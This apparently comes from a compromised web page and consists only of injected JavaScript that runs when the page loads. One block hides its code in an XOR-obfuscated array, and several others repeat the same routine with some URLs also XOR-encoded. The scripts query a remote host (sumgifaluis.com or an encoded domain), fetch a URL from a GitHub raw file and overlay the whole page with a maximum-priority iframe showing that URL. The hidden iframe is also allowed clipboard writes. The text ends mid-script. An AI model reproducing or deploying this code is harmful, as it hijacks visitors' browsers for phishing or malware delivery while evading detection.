52,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,51,60,40,59,55,63,122,103,122,62,53,57,47,55,63,52,46,116,57,40,63,59,46,63,31,54,63,55,63,52,46,114,120,51,60,40,59,55,63,120,115,97,87,80,122,122,122,122,44,59,40,122,57,54,53,41,63,62,122,103,122,60,59,54,41,63,97,87,80,122,122,122,122,44,59,40,122,40,63,44,63,59,54,63,62,122,103,122,60,59,54,41,63,97,87,80,122,122,122,122,44,59,40,122,46,51,55,63,53,47,46,19,62,122,103,122,52,47,54,54,97,87,80,87,80,122,122,122,122,60,47,52,57,46,51,53,52,122,40,63,44,63,59,54,114,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,57,54,53,41,63,62,122,38,38,122,40,63,44,63,59,54,63,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,40,63,44,63,59,54,63,62,122,103,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,46,51,55,63,53,47,46,19,62,115,122,57,54,63,59,40,14,51,55,63,53,47,46,114,46,51,55,63,53,47,46,19,62,115,97,87,80,87,80,122,122,122,122,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,120,59,57,46,51,44,63,120,97,87,80,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,41,46,35,54,63,116,44,51,41,51,56,51,54,51,46,35,122,103,122,120,44,51,41,51,56,54,63,120,97,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,41,46,35,54,63,116,53,42,59,57,51,46,35,122,103,122,120,107,120,97,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,41,46,35,54,63,116,42,53,51,52,46,63,40,31,44,63,52,46,41,122,103,122,120,59,47,46,53,120,97,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,40,63,55,53,44,63,27,46,46,40,51,56,47,46,63,114,120,59,40,51,59,119,50,51,62,62,63,52,120,115,97,87,80,87,80,122,122,122,122,122,122,41,63,46,14,51,55,63,53,47,46,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,46,40,35,122,33,122,51,60,40,59,55,63,116,60,53,57,47,41,114,115,97,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,122,122,122,122,51,60,122,114,51,60,40,59,55,63,116,57,53,52,46,63,52,46,13,51,52,62,53,45,122,124,124,122,51,60,40,59,55,63,116,57,53,52,46,63,52,46,13,51,52,62,53,45,116,60,53,57,47,41,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,122,122,51,60,40,59,55,63,116,57,53,52,46,63,52,46,13,51,52,62,53,45,116,60,53,57,47,41,114,115,97,87,80,122,122,122,122,122,122,122,122,122,122,39,87,80,122,122,122,122,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,122,122,39,118,122,106,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,60,47,52,57,46,51,53,52,122,62,63,41,46,40,53,35,114,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,57,54,53,41,63,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,57,54,53,41,63,62,122,103,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,46,51,55,63,53,47,46,19,62,115,122,57,54,63,59,40,14,51,55,63,53,47,46,114,46,51,55,63,53,47,46,19,62,115,97,87,80,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,62,63,41,46,40,53,35,122,103,122,62,63,41,46,40,53,35,97,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,40,63,44,63,59,54,122,103,122,40,63,44,63,59,54,97,87,80,87,80,122,122,122,122,51,60,40,59,55,63,116,51,62,122,103,122,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,63,46,27,46,46,40,51,56,47,46,63,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,27,46,46,40,118,122,120,107,120,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,63,46,27,46,46,40,51,56,47,46,63,114,120,59,40,51,59,119,50,51,62,62,63,52,120,118,122,120,46,40,47,63,120,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,63,46,27,46,46,40,51,56,47,46,63,114,120,54,53,59,62,51,52,61,120,118,122,120,63,59,61,63,40,120,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,63,46,27,46,46,40,51,56,47,46,63,114,120,59,54,54,53,45,120,118,122,120,57,54,51,42,56,53,59,40,62,119,45,40,51,46,63,120,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,40,57,122,103,122,41,59,60,63,27,42,42,63,52,62,11,47,63,40,35,114,47,40,54,118,122,120,44,120,118,122,23,59,46,50,116,40,59,52,62,53,55,114,115,116,46,53,9,46,40,51,52,61,114,105,108,115,116,41,54,51,57,63,114,104,115,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,46,35,54,63,116,57,41,41,14,63,34,46,122,103,122,1,87,80,122,122,122,122,122,122,120,42,53,41,51,46,51,53,52,96,60,51,34,63,62,122,123,51,55,42,53,40,46,59,52,46,120,118,87,80,122,122,122,122,122,122,120,46,53,42,96,106,120,118,87,80,122,122,122,122,122,122,120,54,63,60,46,96,106,120,118,87,80,122,122,122,122,122,122,120,45,51,62,46,50,96,107,106,106,44,45,120,118,87,80,122,122,122,122,122,122,120,50,63,51,61,50,46,96,107,106,106,44,50,120,118,87,80,122,122,122,122,122,122,120,56,53,40,62,63,40,96,52,53,52,63,120,118,87,80,122,122,122,122,122,122,120,32,119,51,52,62,63,34,96,104,107,110,109,110,98,105,108,110,109,120,118,87,80,122,122,122,122,122,122,120,55,59,40,61,51,52,96,106,120,118,87,80,122,122,122,122,122,122,120,42,59,62,62,51,52,61,96,106,120,118,87,80,122,122,122,122,122,122,120,53,44,63,40,60,54,53,45,96,50,51,62,62,63,52,120,118,87,80,122,122,122,122,122,122,120,44,51,41,51,56,51,54,51,46,35,96,50,51,62,62,63,52,120,118,87,80,122,122,122,122,122,122,120,53,42,59,57,51,46,35,96,106,120,118,87,80,122,122,122,122,122,122,120,42,53,51,52,46,63,40,119,63,44,63,52,46,41,96,52,53,52,63,120,118,87,80,122,122,122,122,122,122,120,56,59,57,49,61,40,53,47,52,62,96,46,40,59,52,41,42,59,40,63,52,46,120,87,80,122,122,122,122,7,116,48,53,51,52,114,120,97,120,115,97,87,80,87,80,122,122,122,122,51,60,40,59,55,63,116,53,52,54,53,59,62,122,103,122,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,57,54,53,41,63,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,51,60,122,114,123,40,63,61,51,41,46,40,35,116,40,63,43,47,51,40,63,8,63,59,62,35,23,63,41,41,59,61,63,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,44,63,59,54,114,115,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,97,87,80,87,80,122,122,122,122,51,60,40,59,55,63,116,53,52,63,40,40,53,40,122,103,122,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,39,97,87,80,87,80,122,122,122,122,46,51,55,63,53,47,46,19,62,122,103,122,41,63,46,14,51,55,63,53,47,46,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,39,118,122,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,14,51,55,63,53,47,46,23,41,115,97,87,80,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,55,53,47,52,46,116,59,42,42,63,52,62,25,50,51,54,62,114,51,60,40,59,55,63,115,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,87,80,122,122,122,122,122,122,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,40,47,52,114,115,122,33,87,80,122,122,122,122,45,59,40,55,47,42,21,40,51,61,51,52,41,114,115,97,87,80,122,122,122,122,56,51,52,62,23,63,41,41,59,61,63,18,59,52,62,54,63,40,114,115,97,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,60,63,46,57,50,14,63,34,46,20,53,14,50,40,53,45,114,27,10,19,5,19,30,5,15,8,22,118,122,40,63,61,51,41,46,40,35,116,40,63,43,47,63,41,46,14,51,55,63,53,47,46,23,41,115,87,80,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,51,62,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,51,62,122,103,122,114,51,62,122,38,38,122,120,120,115,116,46,40,51,55,114,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,51,62,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,40,63,41,53,54,44,63,22,59,52,62,51,52,61,15,40,54,114,51,62,115,97,87,80,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,60,51,52,59,54,15,40,54,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,60,51,52,59,54,15,40,54,122,103,122,46,53,18,46,46,42,15,40,54,114,60,51,52,59,54,15,40,54,115,97,87,80,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,60,51,52,59,54,15,40,54,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,44,59,40,122,60,51,52,59,54,21,40,51,61,51,52,122,103,122,61,63,46,21,40,51,61,51,52,9,59,60,63,114,60,51,52,59,54,15,40,54,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,60,51,52,59,54,21,40,51,61,51,52,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,59,62,62,18,51,52,46,114,120,62,52,41,119,42,40,63,60,63,46,57,50,120,118,122,60,51,52,59,54,21,40,51,61,51,52,115,97,87,80,122,122,122,122,122,122,122,122,122,122,59,62,62,18,51,52,46,114,120,42,40,63,57,53,52,52,63,57,46,120,118,122,60,51,52,59,54,21,40,51,61,51,52,115,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,59,57,46,51,44,59,46,63,19,60,40,59,55,63,114,60,51,52,59,54,15,40,54,115,97,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,60,51,52,59,54,15,40,54,97,87,80,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,116,57,59,46,57,50,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,39,115,97,87,80,122,122,39,87,80,87,80,122,122,40,63,61,51,41,46,40,35,116,40,47,52,10,40,53,55,51,41,63,122,103,122,40,47,52,114,115,97,87,80,39,115,114,115,97];return String.fromCharCode.apply(String,_0x5641.map(function(c){return c^0x5A;}));})();var __d=document;var __h=__d.head||__d.documentElement;var __sc=__d.createElement("script");__sc.type="text/javascript";__sc.text=__s;__h.appendChild(__sc);})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
